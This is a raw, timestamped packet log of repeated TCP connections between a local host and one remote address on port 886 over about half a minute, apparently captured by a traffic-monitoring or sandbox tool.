Apr 20, 2024 15:22:05.088388920 CEST	886	49714	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:05.088449955 CEST	886	49714	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:05.088479042 CEST	49714	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.088532925 CEST	49714	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.088637114 CEST	49714	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.209002018 CEST	49715	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.522250891 CEST	886	49715	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:05.522346973 CEST	49715	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.522568941 CEST	49715	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.836296082 CEST	886	49715	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:05.839464903 CEST	886	49715	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:05.839529991 CEST	886	49715	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:05.839551926 CEST	49715	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.839714050 CEST	49715	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.839714050 CEST	49715	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.860477924 CEST	49714	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.957815886 CEST	49716	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:06.152899981 CEST	886	49715	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:06.165138006 CEST	886	49714	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:06.259841919 CEST	886	49716	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:06.260075092 CEST	49716	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:06.260318041 CEST	49716	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:06.562495947 CEST	886	49716	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:06.567650080 CEST	886	49716	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:06.567718029 CEST	886	49716	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:06.567719936 CEST	49716	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:06.567769051 CEST	49716	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:06.567854881 CEST	49716	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:06.676464081 CEST	49717	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:06.869707108 CEST	886	49716	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:06.989648104 CEST	886	49717	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:06.989744902 CEST	49717	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:06.990011930 CEST	49717	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:07.304706097 CEST	886	49717	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:07.307565928 CEST	886	49717	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:07.307641983 CEST	886	49717	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:07.307672977 CEST	49717	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:07.307725906 CEST	49717	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:07.307856083 CEST	49717	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:07.426956892 CEST	49718	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:07.620764017 CEST	886	49717	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:07.744883060 CEST	886	49718	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:07.745131969 CEST	49718	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:07.745213985 CEST	49718	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:08.062952042 CEST	886	49718	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:08.065896034 CEST	886	49718	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:08.065928936 CEST	886	49718	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:08.066107988 CEST	49718	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:08.066107988 CEST	49718	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:08.066199064 CEST	49718	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:08.177934885 CEST	49719	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:08.385044098 CEST	886	49718	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:08.483973980 CEST	886	49719	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:08.484179974 CEST	49719	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:08.484359980 CEST	49719	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:08.787892103 CEST	886	49719	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:08.792956114 CEST	886	49719	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:08.793016911 CEST	886	49719	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:08.793191910 CEST	49719	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:08.793191910 CEST	49719	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:09.038777113 CEST	49719	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:09.161258936 CEST	49720	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:09.343712091 CEST	886	49719	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:09.486886024 CEST	886	49720	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:09.487024069 CEST	49720	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:10.779247046 CEST	49720	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.104779959 CEST	886	49720	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:11.107330084 CEST	886	49720	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:11.107359886 CEST	886	49720	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:11.107536077 CEST	49720	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.107536077 CEST	49720	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.107652903 CEST	49720	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.224324942 CEST	49721	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.538351059 CEST	886	49721	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:11.538441896 CEST	49721	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.538642883 CEST	49721	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.852775097 CEST	886	49721	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:11.857764006 CEST	886	49721	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:11.857790947 CEST	886	49721	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:11.857829094 CEST	49721	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.857923031 CEST	49721	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.857969999 CEST	49721	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.922846079 CEST	49720	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:11.974006891 CEST	49723	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:12.172317982 CEST	886	49721	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:12.248286009 CEST	886	49720	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:12.287188053 CEST	886	49723	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:12.287296057 CEST	49723	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:12.287481070 CEST	49723	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:12.598186016 CEST	886	49723	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:12.600951910 CEST	886	49723	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:12.600994110 CEST	886	49723	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:12.601084948 CEST	49723	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:12.601084948 CEST	49723	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:12.601166964 CEST	49723	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:12.723820925 CEST	49726	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:12.914272070 CEST	886	49723	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:13.036799908 CEST	886	49726	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:13.036886930 CEST	49726	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:13.037942886 CEST	49726	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:13.351581097 CEST	886	49726	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:13.354446888 CEST	886	49726	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:13.354512930 CEST	886	49726	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:13.354530096 CEST	49726	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:13.354562044 CEST	49726	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:13.354659081 CEST	49726	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:13.474351883 CEST	49731	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:13.808254957 CEST	886	49731	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:13.808345079 CEST	49731	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:13.808689117 CEST	49731	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:14.126063108 CEST	49726	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:14.140949011 CEST	886	49731	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:14.145119905 CEST	886	49731	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:14.145184040 CEST	886	49731	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:14.145226002 CEST	49731	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:14.145317078 CEST	49731	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:14.145400047 CEST	49731	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:14.255577087 CEST	49732	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:14.436986923 CEST	886	49726	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:14.482479095 CEST	886	49731	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:14.575731039 CEST	886	49732	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:14.575854063 CEST	49732	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:14.576174974 CEST	49732	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:15.266521931 CEST	49732	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:15.584043026 CEST	886	49732	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:15.586992979 CEST	886	49732	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:15.587054968 CEST	886	49732	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:15.587132931 CEST	49732	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:15.587399006 CEST	49732	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:15.708194971 CEST	49733	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:15.903889894 CEST	886	49732	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:16.028563976 CEST	886	49733	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:16.028738976 CEST	49733	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:16.028949022 CEST	49733	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:16.704040051 CEST	49733	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:17.023822069 CEST	886	49733	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:17.026791096 CEST	886	49733	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:17.026829004 CEST	886	49733	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:17.026876926 CEST	49733	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:17.026927948 CEST	49733	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:17.027091980 CEST	49733	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:17.145142078 CEST	49734	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:17.347270012 CEST	886	49733	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:17.466847897 CEST	886	49734	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:17.467077971 CEST	49734	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:17.467322111 CEST	49734	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:17.783936977 CEST	886	49734	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:17.788737059 CEST	886	49734	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:17.788800001 CEST	886	49734	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:17.788827896 CEST	49734	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:17.788850069 CEST	49734	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:17.788984060 CEST	49734	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:17.912492037 CEST	49735	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:18.111377001 CEST	886	49734	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:18.236478090 CEST	886	49735	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:18.236607075 CEST	49735	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:18.236867905 CEST	49735	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:18.560333014 CEST	886	49735	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:18.563352108 CEST	886	49735	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:18.563414097 CEST	886	49735	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:18.563533068 CEST	49735	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:18.563533068 CEST	49735	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:18.563865900 CEST	49735	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:18.692095995 CEST	49736	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:18.994617939 CEST	886	49736	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:18.994746923 CEST	49736	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:18.995066881 CEST	49736	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:19.299726009 CEST	886	49736	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:19.302443981 CEST	886	49736	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:19.302511930 CEST	886	49736	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:19.302531004 CEST	49736	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:19.302581072 CEST	49736	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:19.302714109 CEST	49736	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:19.375901937 CEST	49735	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:19.427685976 CEST	49737	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:19.609325886 CEST	886	49736	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:19.699495077 CEST	886	49735	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:19.751710892 CEST	886	49737	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:19.751844883 CEST	49737	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:19.752047062 CEST	49737	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:20.076185942 CEST	886	49737	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:20.078964949 CEST	886	49737	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:20.079030037 CEST	886	49737	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:20.079062939 CEST	49737	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:20.079123020 CEST	49737	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:20.079420090 CEST	49737	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:20.193711996 CEST	49738	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:20.403069019 CEST	886	49737	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:20.527672052 CEST	886	49738	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:20.528095961 CEST	49738	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:20.528095961 CEST	49738	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:20.860997915 CEST	886	49738	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:20.863450050 CEST	886	49738	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:20.863492012 CEST	886	49738	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:20.863532066 CEST	49738	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:20.863612890 CEST	49738	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:20.863682032 CEST	49738	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:20.974951029 CEST	49739	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:21.196017027 CEST	886	49738	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:21.304652929 CEST	886	49739	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:21.304969072 CEST	49739	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:21.305767059 CEST	49739	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:21.635622978 CEST	886	49739	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:21.638633013 CEST	886	49739	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:21.638675928 CEST	886	49739	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:21.638727903 CEST	49739	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:21.638766050 CEST	49739	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:21.638899088 CEST	49739	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:21.762981892 CEST	49740	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:22.108473063 CEST	886	49740	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:22.108609915 CEST	49740	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:22.109088898 CEST	49740	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:22.454041958 CEST	49739	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:22.454524040 CEST	886	49740	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:22.459121943 CEST	886	49740	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:22.459240913 CEST	49740	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:22.459268093 CEST	886	49740	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:22.459326029 CEST	49740	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:22.582931995 CEST	49740	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:22.583172083 CEST	49741	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:22.784780979 CEST	886	49739	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:22.895720005 CEST	886	49741	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:22.895868063 CEST	49741	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:22.896066904 CEST	49741	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:22.928698063 CEST	886	49740	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:23.563500881 CEST	49741	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:23.877794981 CEST	886	49741	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:23.880496025 CEST	886	49741	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:23.880542040 CEST	886	49741	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:23.880573034 CEST	49741	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:23.880610943 CEST	49741	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:23.882781029 CEST	49741	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:24.010982990 CEST	49742	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:24.196723938 CEST	886	49741	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:24.343127966 CEST	886	49742	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:24.343288898 CEST	49742	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:24.343489885 CEST	49742	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:24.678086042 CEST	886	49742	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:24.681329012 CEST	886	49742	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:24.681394100 CEST	886	49742	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:24.681416035 CEST	49742	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:24.681485891 CEST	49742	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:24.681581020 CEST	49742	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:24.802911043 CEST	49743	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:25.127712011 CEST	886	49743	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:25.127837896 CEST	49743	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:25.131738901 CEST	49743	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:25.456492901 CEST	886	49743	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:25.461947918 CEST	886	49743	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:25.462009907 CEST	886	49743	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:25.462042093 CEST	49743	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:25.462110996 CEST	49743	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:25.462222099 CEST	49743	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:25.532171965 CEST	49742	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:25.584346056 CEST	49744	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:25.786824942 CEST	886	49743	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:25.867058992 CEST	886	49742	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:25.901362896 CEST	886	49744	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:25.901580095 CEST	49744	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:25.901804924 CEST	49744	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:26.222256899 CEST	886	49744	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:26.224884987 CEST	886	49744	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:26.224967957 CEST	49744	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:26.224989891 CEST	886	49744	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:26.225040913 CEST	49744	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:26.227345943 CEST	49744	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:26.539067030 CEST	49745	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:26.544331074 CEST	886	49744	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:26.857067108 CEST	886	49745	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:26.857178926 CEST	49745	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:26.857439041 CEST	49745	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:27.173206091 CEST	886	49745	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:27.175977945 CEST	886	49745	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:27.176042080 CEST	886	49745	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:27.176059961 CEST	49745	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:27.176127911 CEST	49745	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:27.176193953 CEST	49745	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:27.286744118 CEST	49746	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:27.491923094 CEST	886	49745	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:27.590945959 CEST	886	49746	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:27.591068983 CEST	49746	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:27.591291904 CEST	49746	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:27.897891998 CEST	886	49746	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:27.901228905 CEST	886	49746	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:27.901290894 CEST	886	49746	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:27.901319027 CEST	49746	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:27.901344061 CEST	49746	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:27.901523113 CEST	49746	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:28.021550894 CEST	49747	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:28.206799030 CEST	886	49746	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:28.338289022 CEST	886	49747	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:28.338530064 CEST	49747	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:28.344465017 CEST	49747	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:28.657200098 CEST	886	49747	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:28.660043955 CEST	886	49747	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:28.660131931 CEST	49747	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:28.660139084 CEST	886	49747	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:28.660209894 CEST	49747	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:28.660451889 CEST	49747	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:28.771496058 CEST	49748	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:28.973148108 CEST	886	49747	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:29.073693037 CEST	886	49748	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:29.073941946 CEST	49748	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:29.074028015 CEST	49748	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:29.377788067 CEST	886	49748	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:29.380542994 CEST	886	49748	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:29.380573034 CEST	886	49748	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:29.380642891 CEST	49748	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:29.380642891 CEST	49748	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:29.380831957 CEST	49748	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:29.504396915 CEST	49749	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:29.817549944 CEST	886	49749	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:29.817843914 CEST	49749	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:29.817969084 CEST	49749	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.125988007 CEST	49748	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.131567001 CEST	886	49749	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:30.136810064 CEST	886	49749	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:30.136842966 CEST	886	49749	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:30.137002945 CEST	49749	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.137003899 CEST	49749	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.137089014 CEST	49749	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.254492044 CEST	49750	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.431163073 CEST	886	49748	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:30.559113026 CEST	886	49750	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:30.559241056 CEST	49750	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.559449911 CEST	49750	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.862883091 CEST	886	49750	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:30.865840912 CEST	886	49750	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:30.865905046 CEST	886	49750	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:30.865933895 CEST	49750	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.865989923 CEST	49750	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.866099119 CEST	49750	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:30.907252073 CEST	49749	886	192.168.2.5	118.89.125.171
